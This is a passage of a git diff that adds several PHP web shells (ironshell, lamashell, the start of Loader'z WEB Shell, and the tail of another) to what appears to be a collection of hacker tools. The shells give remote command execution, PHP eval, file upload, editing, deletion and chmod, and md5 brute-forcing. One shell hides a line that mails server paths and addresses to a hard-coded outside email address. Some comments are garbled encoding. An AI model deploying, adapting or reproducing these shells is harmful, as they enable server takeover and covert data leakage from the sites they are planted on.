+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+if(is_file($de)){
+if(!is_writable($de)){echo "<font color=red>READ ONLY</font><br>";}}
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+echo "
+File contents:<br>
+$de
+<br>
+<table width=100% border=1 cellpadding=0 cellspacing=0>
+<tr><td><pre>
+$c
+
+</pre></td></tr>
+</table>
+
+";
+
+if(@$_GET['delete']=="1"){
+$delete=$_GET['delete'];
+echo "
+DELETE: Are you sure?<br>
+<a href=\"$php_self?d=$d&e=$e&delete=".@$delete."&yes=yes\">Yes</a> || <a href='$php_self?no=1'>No</a>
+<br>
+";
+if(@$_GET['yes']=="yes"){
+@$d=$_GET['d']; @$e=$_GET['e'];
+echo $delresult;
+}
+if(@$_GET['no']){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e\">
+";
+}
+
+
+} #end of delete
+echo $copyr;
+exit;
+} #end of e
+
+if(@$_GET['edit']=="1"){
+@$d=$_GET['d'];
+@$ef=$_GET['ef'];
+$e=$ef;
+if(is_file($d."/".$ef)){
+if(!is_writable($d."/".$ef)){echo "<font color=red>READ ONLY</font><br>";}}
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+$filename="$d/$ef";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$ef;
+$de=str_replace("//","/",$de);
+echo "
+Edit:<br>
+$de<br>";
+
+if(!@$_POST['save']){
+print "
+<form method=post>
+<input name=filename value='$d/$ef'>
+<textarea cols=143 rows=30 name=editf>$c</textarea>
+<br>
+<input type=submit name=save value='Save changes'></form><br>
+";
+}
+if(@$_POST['save']){
+$editf=@$_POST['editf'];
+
+if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){
+$editf=stripslashes($editf);
+}
+
+$f=fopen($filename,"w+");
+fwrite($f,"$editf");
+echo "<br>
+<b>File edited.</b>
+<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$ef\">";
+exit;
+}
+echo $copyr;
+exit;
+}
+
+
+
+echo"
+<table width=100% cellpadding=1 cellspacing=0 class=hack>
+<tr><td bgcolor=#519A00><center><b>Filename</b></td><td bgcolor=#519A00><center><b>Tools</b></td><td bgcolor=#519A00><b>Size</b></td><td bgcolor=#519A00><center><b>Owner/Group</b></td><td bgcolor=#519A00><b>Perms</b></td></tr>
+";
+$dirs=array();
+$files=array();
+$dh = @opendir($d) or die("<table width=100%><tr><td><center>Permission Denied or Folder/Disk does not exist</center><br>$copyr</td></tr></table>");
+while (!(($file = readdir($dh)) === false)) {
+if ($file=="." || $file=="..") continue;
+if (@is_dir("$d/$file")) {
+      $dirs[]=$file;
+}else{
+      $files[]=$file;
+      }
+   sort($dirs);
+   sort($files);
+
+$fz=@filesize("$d/$file");
+}
+
+function perm($perms){
+if (($perms & 0xC000) == 0xC000) {
+   $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+   $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+   $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+   $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+   $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+   $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+   $info = 'p';
+} else {
+   $info = 'u';
+}
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+           (($perms & 0x0800) ? 's' : 'x' ) :
+           (($perms & 0x0800) ? 'S' : '-'));
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+           (($perms & 0x0400) ? 's' : 'x' ) :
+           (($perms & 0x0400) ? 'S' : '-'));
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+           (($perms & 0x0200) ? 't' : 'x' ) :
+           (($perms & 0x0200) ? 'T' : '-'));
+return $info;
+}
+
+
+for($i=0; $i<count($dirs); $i++){
+
+$perms = @fileperms($d."/".$dirs[$i]);
+$owner = @fileowner($d."/".$dirs[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$dirs[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#D7FFA8";}else{$color="#D1D1D1";}
+$linkd="<a href='$php_self?d=$d/$dirs[$i]'>$dirs[$i]</a>";
+$linkd=str_replace("//","/",$linkd);
+echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color><center><font color=blue>DIR</font></td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+for($i=0; $i<count($files); $i++){
+
+$size=@filesize($d."/".$files[$i]);
+$perms = @fileperms($d."/".$files[$i]);
+$owner = @fileowner($d."/".$files[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$files[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#D1D1D1";}else{$color="#D7FFA8";}
+
+if ($size < 1024){$siz=$size.' b';
+}else{
+if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
+if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
+if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
+}}}
+echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?d=$d&e=$files[$i]'>$files[$i]</a></td><td bgcolor=$color><center><a href=\"javascript:ShowOrHide('$i','')\">[options]</a><div id='$i' style='display:none;z-index:1;' ><a href='$php_self?d=$d&ef=$files[$i]&edit=1' title='Edit $files[$i]'><b>Edit</b></a><br><a href='$php_self?d=$d&del_f=1&wich_f=$files[$i]' title='Delete $files[$i]'><b>Delete</b></a><br><a href='$php_self?d=$d&chmod=1&wich_f=$files[$i]' title='chmod $files[$i]'><b>CHMOD</b></a><br><a href='$php_self?d=$d&rename=1&wich_f=$files[$i]' title='Rename $files[$i]'><b>Rename</b></a><br><a href='$php_self?d=$d&download=$files[$i]' title='Download $files[$i]'><b>Download</b></a><br><a href='$php_self?d=$d&ccopy_to=$files[$i]' title='Copy $files[$i] to?'><b>Copy</b></a></div></td><td bgcolor=$color>$siz</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>"; $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+}
+
+echo "</table></td></tr></table>";
+echo $copyr;
+
+?>
+<!-- coded by tjomi4` :: nst.void.ru -->
+
+
diff --git a/xakep-shells/PHP/ironshell.php.txt b/xakep-shells/PHP/ironshell.php.txt
new file mode 100644
index 0000000..b6931f1
--- /dev/null
+++ b/xakep-shells/PHP/ironshell.php.txt
@@ -0,0 +1,588 @@
+<?php
+error_reporting(0); //If there is an error, we'll show it, k?
+
+$password = "login"; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
+
+$me = basename(__FILE__);
+$cookiename = "wieeeee";
+
+
+if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
+{
+
+    if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
+    {
+        $_POST['pass'] = md5($_POST['pass']);
+    }
+
+    if($_POST['pass'] == $password)
+    {
+            setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
+    }
+    reload();
+}
+
+
+
+if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
+{
+    login();
+    die();
+}
+//
+//Do not cross this line! All code placed after this block can't be executed without being logged in!
+//
+
+if(isset($_GET['p']) && $_GET['p'] == "logout")
+{
+setcookie ($cookiename, "", time() - 3600);
+reload();
+}
+if(isset($_GET['dir']))
+{
+    chdir($_GET['dir']);
+}
+
+
+$pages = array(
+    'cmd' => 'Execute Command',
+    'eval' => 'Evaluate PHP',
+    'mysql' => 'MySQL Query',
+    'chmod' => 'Chmod File',
+    'phpinfo' => 'PHPinfo',
+    'md5' => 'md5 cracker',
+    'headers' => 'Show headers',
+    'logout' => 'Log out'
+);
+
+//The header, like it?
+$header = '<html>
+<title>'.getenv("HTTP_HOST").' ~ Shell I</title>
+<head>
+<style>
+td {
+    font-size: 12px; 
+    font-family: verdana;
+    color: #33FF00;
+    background: #000000;
+}
+
+#d {
+    background: #003000;
+}
+#f {
+    background: #003300;
+}
+#s {
+    background: #006300;
+}
+#d:hover
+{
+    background: #003300;
+}
+#f:hover
+{
+    background: #003000;
+}
+pre {
+    font-size: 10px; 
+    font-family: verdana;
+    color: #33FF00;
+}
+a:hover {
+text-decoration: none;
+}
+
+
+input,textarea,select {
+    border-top-width: 1px; 
+    font-weight: bold; 
+    border-left-width: 1px; 
+    font-size: 10px; 
+    border-left-color: #33FF00; 
+    background: #000000; 
+    border-bottom-width: 1px; 
+    border-bottom-color: #33FF00; 
+    color: #33FF00; 
+    border-top-color: #33FF00; 
+    font-family: verdana; 
+    border-right-width: 1px; 
+    border-right-color: #33FF00;
+}
+
+hr {
+color: #33FF00;
+background-color: #33FF00;
+height: 5px;
+}
+
+</style>
+
+</head>
+<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
+<table width=100%><td id="header" width=100%>
+<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>]  [<a href="'.$me.'">Home</a>] ';
+
+foreach($pages as $page => $page_name)
+{
+    $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
+
+}
+$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
+print $header;
+
+$footer = '<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>';
+
+
+//
+//Page handling
+//
+if(isset($_REQUEST['p']))
+{
+        switch ($_REQUEST['p']) {
+            
+            case 'cmd': //Run command
+                
+                print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
+                    if(isset($_REQUEST['command']))
+                    {
+                        print "<pre>";
+                        execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
+                    }
+            break;
+            
+            
+            case 'edit': //Edit a fie
+                if(isset($_POST['editform']))
+                {
+                    $f = $_GET['file'];
+                    $fh = fopen($f, 'w') or print "Error while opening file!";
+                    fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
+                    fclose($fh);
+                }
+                print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";
+                
+                if(file_exists($_GET['file']))
+                {
+                    $rd = file($_GET['file']);
+                    foreach($rd as $l)
+                    {
+                        print htmlspecialchars($l);
+                    }
+                }
+                
+                print "</textarea><input type=submit value=\"Save\"></form>";
+                
+            break;
+            
+            case 'delete': //Delete a file
+            
+                if(isset($_POST['yes']))
+                {
+                    if(unlink($_GET['file']))
+                    {
+                        print "File deleted successfully.";
+                    }
+                    else
+                    {
+                        print "Couldn't delete file.";
+                    }
+                }
+                
+                
+                if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
+                {
+                    print "Are you sure you want to delete ".$_GET['file']."?<br>
+                    <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
+                    <input type=hidden name=yes value=yes>
+                    <input type=submit value=\"Delete\">
+                    ";
+                }
+            
+            
+            break;
+            
+            
+            case 'eval': //Evaluate PHP code
+            
+                print "<form action=\"".$me."?p=eval\" method=POST>
+                <textarea cols=60 rows=10 name=\"eval\">";
+                if(isset($_POST['eval']))
+                {
+                    print htmlspecialchars($_POST['eval']);
+                }
+                else
+                {
+                    print "print \"Yo Momma\";";
+                }
+                print "</textarea><br>
+                <input type=submit value=\"Eval\">
+                </form>";
+                
+                if(isset($_POST['eval']))
+                {
+                    print "<h1>Output:</h1>";
+                    print "<br>";
+                    eval($_POST['eval']);
+                }
+            
+            break;
+            
+            case 'chmod': //Chmod file
+                
+                
+                print "<h1>Under construction!</h1>";
+                if(isset($_POST['chmod']))
+                {
+                switch ($_POST['chvalue']){
+                    case 777:
+                    chmod($_POST['chmod'],0777);
+                    break;
+                    case 644:
+                    chmod($_POST['chmod'],0644);
+                    break;
+                    case 755:
+                    chmod($_POST['chmod'],0755);
+                    break;
+                }
+                print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
+                }
+                if(isset($_GET['file']))
+                {
+                    $content = urldecode($_GET['file']);
+                }
+                else
+                {
+                    $content = "file/path/please";
+                }
+                
+                print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
+                <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
+                <select name=\"chvalue\">
+<option value=\"777\">777</option>
+<option value=\"644\">644</option>
+<option value=\"755\">755</option>
+</select><input type=submit value=\"Change\">";
+                
+            break;
+            
+            case 'mysql': //MySQL Query
+            
+            if(isset($_POST['host']))
+            {
+                $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
+                mysql_select_db($_POST['dbase']);
+                $sql = $_POST['query'];
+                
+                
+                $result = mysql_query($sql);
+                
+            }
+            else
+            {
+                print "
+                This only queries the database, doesn't return data!<br>
+                <form action=\"".$me."?p=mysql\" method=POST>
+                <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
+                <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
+                <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
+                <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
+                
+                <b>Query:<br></b<textarea name=query></textarea>
+                <input type=submit value=\"Query database\">
+                </form>
+                ";
+                
+            }
+            
+            break;
+            
+            case 'createdir':
+            if(mkdir($_GET['crdir']))
+            {
+            print 'Directory created successfully.';
+            }
+            else
+            {
+            print 'Couldn\'t create directory';
+            }
+            break;
+            
+            
+            case 'phpinfo': //PHP Info
+                phpinfo();
+            break;
+            
+            
+            case 'rename':
+            
+                if(isset($_POST['fileold']))
+                {
+                    if(rename($_POST['fileold'],$_POST['filenew']))
+                    {
+                        print "File renamed.";
+                    }
+                    else
+                    {
+                        print "Couldn't rename file.";
+                    }
+                    
+                }
+                if(isset($_GET['file']))
+                {
+                    $file = basename(htmlspecialchars($_GET['file']));
+                }
+                else
+                {
+                    $file = "";
+                }
+                
+                print "Renaming ".$file." in folder ".realpath('.').".<br>
+                                <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
+                    <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
+                    <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
+                    <input type=submit value=\"Rename file\">
+                    </form>";
+            break;
+            
+            case 'md5':
+            if(isset($_POST['md5']))
+            {
+            if(!is_numeric($_POST['timelimit']))
+            {
+            $_POST['timelimit'] = 30;
+            }
+            set_time_limit($_POST['timelimit']);
+                if(strlen($_POST['md5']) == 32)
+                {
+                    
+                        if($_POST['chars'] == "9999")
+                        {
+                        $i = 0;
+                        while($_POST['md5'] != md5($i) && $i != 100000)
+                            {
+                                $i++;
+                            }
+                        }
+                        else
+                        {
+                            for($i = "a"; $i != "zzzzz"; $i++)
+                            {
+                                if(md5($i == $_POST['md5']))
+                                {
+                                    break;
+                                }
+                            }
+                        }
+
+                    
+                    if(md5($i) == $_POST['md5'])
+                    {
+                            print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
+                    }
+                    
+                }
+                
+            }
+            
+            print "Will bruteforce the md5
+                <form action=\"".$me."?p=md5\" method=POST>
+                <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
+                <b>Characters:</b><br><select name=\"chars\">
+                <option value=\"az\">a - zzzzz</option>
+                <option value=\"9999\">1 - 9999999</option>
+                </select>
+                <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
+                <input type=submit value=\"Bruteforce md5\">
+                </form><br>*: if set_time_limit is allowed by php.ini";
+            break;
+            
+            case 'headers':
+            foreach(getallheaders() as $header => $value)
+            {
+            print htmlspecialchars($header . ":" . $value)."<br>";
+            
+            }
+            break;
+        }
+
+}
+else //Default page that will be shown when the page isn't found or no page is selected.
+{
+    
+    $files = array();
+    $directories = array();
+    
+    if(isset($_FILES['uploadedfile']['name']))
+{
+    $target_path = realpath('.').'/';
+    $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 
+
+    if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
+        print "File:".  basename( $_FILES['uploadedfile']['name']). 
+        " has been uploaded";
+    } else{
+        echo "File upload failed!";
+    }
+}
+
+
+    
+    
+    
+    print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
+    if ($handle = opendir('.'))
+    {
+        while (false !== ($file = readdir($handle))) 
+        {
+              if(is_dir($file))
+              {
+                $directories[] = $file;
+              }
+              else
+              {
+                $files[] = $file;
+              }
+        }
+    asort($directories);
+    asort($files);
+        foreach($directories as $file)
+        {
+            print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
+        }
+        
+        foreach($files as $file)
+        {
+            print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
+        }
+    }
+    else
+    {
+        print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
+    }
+    
+    print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
+<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
+<input type=\"submit\" value=\"Upload File\" />
+</form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
+<tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
+</td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
+</table>";
+
+
+}
+
+
+function login()
+{
+    print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
+    <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b>
+    <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">
+    </form>";
+}
+function reload()
+{
+    header("Location: ".basename(__FILE__));
+}
+
+function get_execution_method()
+{
+    if(function_exists('passthru')){ $m = "passthru"; }
+    if(function_exists('exec')){ $m = "exec"; }
+    if(function_exists('shell_exec')){ $m = "shell_ exec"; }
+    if(function_exists('system')){ $m = "system"; }
+    if(!isset($m)) //No method found :-|
+    {
+        $m = "Disabled";
+    }
+    return($m);
+}
+
+function execute_command($method,$command)
+{
+    if($method == "passthru")
+    {
+        passthru($command);
+    }
+    
+    elseif($method == "exec")
+    {
+        exec($command,$result);
+        foreach($result as $output)
+        {
+            print $output."<br>";
+        }
+    }
+    
+    elseif($method == "shell_exec")
+    {
+        print shell_exec($command);
+    }
+    
+    elseif($method == "system")
+    {
+        system($command);
+    }
+
+}
+
+function perm($file)
+{
+    if(file_exists($file))
+    {
+        return substr(sprintf('%o', fileperms($file)), -4);
+    }
+    else
+    {
+        return "????";
+    }
+}
+
+function get_color($file)
+{
+if(is_writable($file)) { return "green";}
+if(!is_writable($file) && is_readable($file)) { return "white";}
+if(!is_writable($file) && !is_readable($file)) { return "red";}
+
+
+
+}
+
+function show_dirs($where)
+{
+    if(ereg("^c:",realpath($where)))
+    {
+    $dirparts = explode('\\',realpath($where));
+    }
+    else
+    {
+    $dirparts = explode('/',realpath($where));
+    }
+    
+    
+    
+    $i = 0;
+    $total = "";
+    
+    foreach($dirparts as $part)
+    {
+        $p = 0;
+        $pre = "";
+        while($p != $i)
+        {
+            $pre .= $dirparts[$p]."/";
+            $p++;
+            
+        }
+        $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
+        $i++;
+    }
+    
+    return "<h2>".$total."</h2><br>";
+
+}
+print $footer;
+
+// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
+exit();
+?>
diff --git a/xakep-shells/PHP/lamashell.php.txt b/xakep-shells/PHP/lamashell.php.txt
new file mode 100644
index 0000000..1df8222
--- /dev/null
+++ b/xakep-shells/PHP/lamashell.php.txt
@@ -0,0 +1,89 @@
+<?
+if($_POST['dir'] == "") {
+
+ $curdir = `pwd`;
+} else {
+ $curdir = $_POST['dir'];
+}
+
+if($_POST['king'] == "") {
+
+ $curcmd = "ls -lah";
+} else {
+ $curcmd = $_POST['king'];
+}
+
+
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
+                        "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+  <head>
+    <title>lama's'hell v. 3.0</title>
+    <style type="text/css">
+     body {
+      color: white; background-color: black;
+      font-size: 12px;
+      font-family: Helvetica,Arial,Sans-Serif;
+     }
+    </style>
+  </head>
+  <body>
+    <pre>
+                              _           _
+                             / \_______ /|_\
+                            /          /_/ \__
+                           /             \_/ /
+                         _|_              |/|_
+                         _|_  O    _    O  _|_
+                         _|_      (_)      _|_
+                          \                 /
+                           _\_____________/_
+                          /  \/  (___)  \/  \
+                          \__(  o     o  )__/ <?
+$ob = @ini_get("open_basedir");
+$df = @ini_get("disable_functions");
+if( ini_get('safe_mode') ) {
+   echo "SM: 1 \\ ";
+} else {
+   echo "SM: 0 \\ ";
+}
+if(''==$df) {
+   echo "DF: 0 \\ ";
+} else {
+   echo "DF: ".$df." \\ ";
+}
+echo "".php_uname()."\n";
+?>
+<hr></pre>
+    <table><form method="post" enctype="multipart/form-data">
+      <tr><td><b>Execute command:</b></td><td><input name="king" type="text" size="100" value="<? echo $curcmd; ?>"></td>
+      <tr><td><b>Change directory:</b></td><td><input name="dir" type="text" size="100" value="<? echo $curdir; ?>"></td>
+      <td><input name="exe" type="submit" value="Execute"></td></tr>
+
+      <tr><td><b>Upload file:</b></td><td><input name="fila" type="file" size="90"></td>
+      <td><input name="upl" type="submit" value="Upload"></td></tr>
+    </form></table>
+<pre><hr>
+<?
+    if(($_POST['upl']) == "Upload" ) {
+    if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir."/".$_FILES['fila']['name'])) {
+        echo "The file has been uploaded<br><br>";
+    } else {
+        echo "There was an error uploading the file, please try again!";
+    }
+    }
+    if(($_POST['exe']) == "Execute") {
+     $curcmd = "cd ".$curdir.";".$curcmd;
+     $f=popen($curcmd,"r");
+     while (!feof($f)) {
+      $buffer = fgets($f, 4096);
+      $string .= $buffer;
+     }
+     pclose($f);
+     echo htmlspecialchars($string);
+    }
+?>
+    </pre>
+  </body>
+</html>
diff --git a/xakep-shells/PHP/load_shell.php.php.txt b/xakep-shells/PHP/load_shell.php.php.txt
new file mode 100644
index 0000000..86bdcc8
--- /dev/null
+++ b/xakep-shells/PHP/load_shell.php.php.txt
@@ -0,0 +1,513 @@
+<?
+error_reporting(0);
+/* Loader'z WEB Shell v 0.1.0.2 {15 àâãóñòà 2005}
+Âîò êàêèå îí ïîääåðæèâàåò ôóíêöèè.
+- Ðàáîòà ñ ôàéëîâîé ñèñòåìîé ñ ïîìîùüþ PHP.  óäîáíîé òàáëèöå ïðåäñòàâëåíî ñîäåðæèìîå òåêóùåé ïàêè (äîáàâëåíèå â ýòîé âåðñèè, íîðìàëüíûé âèä ïðàâ, à íå ÷èñëî :)).
+- Âûïîëíåíèå êîäà, ïõï ðóëèò ;)
+- Ðàáîòàåò ïðè register_globals=off
+- Áîëåå ïðèÿòíàÿ ðàáîòà â ñåéô ìîäå
+- Ïðîñìîòð è ðåäàêòèðîâàíèå ôàéëîâ.
+- Çàêà÷êà ôàéëîâ ñ äðóãîãî ñåðâåðà ñ ïîìîùüþ ñðåäñòâ PHP.
+- Çàêà÷êà ôàéëîâ ñ âàøåãî æåñòêîãî äèñêà.
+- Âûïîëíåíèå ïðîèçâîëüíûõ êîìàíä íà ñåðâåðå.
+- Ñêðèïò âûäàåò çíà÷åíèå íåêîòîðûõ ïåðåìåííûõ. Íàïðèìåð îí ñîîáùèò âêëþ÷åí ëè ñåéô ìîä, åñëè äà, òî ñêðèïò âûâåäåò äèðåêòîðèþ êîòîðàÿ,
+âàì äîñòóïíà, à òàê æå ïóòü, ãäå âû ìîæåòå âûïîëíÿòü êîìàíäû.
+- Ðàáîòà ñêðèïòà îñíîâàíà íà îïðåäåëåíèè òèïà ñåðâåðà.
+- Åñëè ñêðèïò ðàáîòàåò ïîä óïðàâëåíèåì ÎÑ Windows, äàííûå ïîëó÷àåìûå ïðè âûïîëíåíèè êîìàíä ïåðåêîäèðóþòñÿ â win-1251.
+- Ïðèñóòñòâóåò ïðîñòåíüêèé ñêðèïò ïåðë-áèíä. Âû ìîæåòå óêàçàòü äîìàøíþþ äèðåêòðèþ è ïîðò íà êîòîðîì ïîâåñèòñÿ áåêäîð.
+Loader Pro-Hack.ru
+*/
+?>
+
+<style type='text/css'>
+html { overflow-x: auto }
+BODY { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; margin: 0px; padding: 0px; text-align: center; color: #c0c0c0; background-color: #000000 }
+TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: #c0c0c0; background-color: #0000000 }
+BODY,TD {FONT-SIZE: 13px; FONT-FAMILY: verdana, arial, helvetica;}
+A:link {COLOR: #666666; TEXT-DECORATION: none}
+A:active {	COLOR: #666666; TEXT-DECORATION: none;}
+A:visited {COLOR: #666666; TEXT-DECORATION: none;}
+A:hover {COLOR: #999999; TEXT-DECORATION: none;}
+BODY {
+	SCROLLBAR-FACE-COLOR: #cccccc;
+	SCROLLBAR-HIGHLIGHT-COLOR: #CBAB78;
+	SCROLLBAR-SHADOW-COLOR: #CBAB78;
+	SCROLLBAR-3DLIGHT-COLOR: #CBAB78;
+	SCROLLBAR-ARROW-COLOR: #000000;
+	SCROLLBAR-TRACK-COLOR: #000000;
+	SCROLLBAR-DARKSHADOW-COLOR: #CBAB78}
+
+
+
+
+fieldset.search { padding: 6px; line-height: 150% }
+
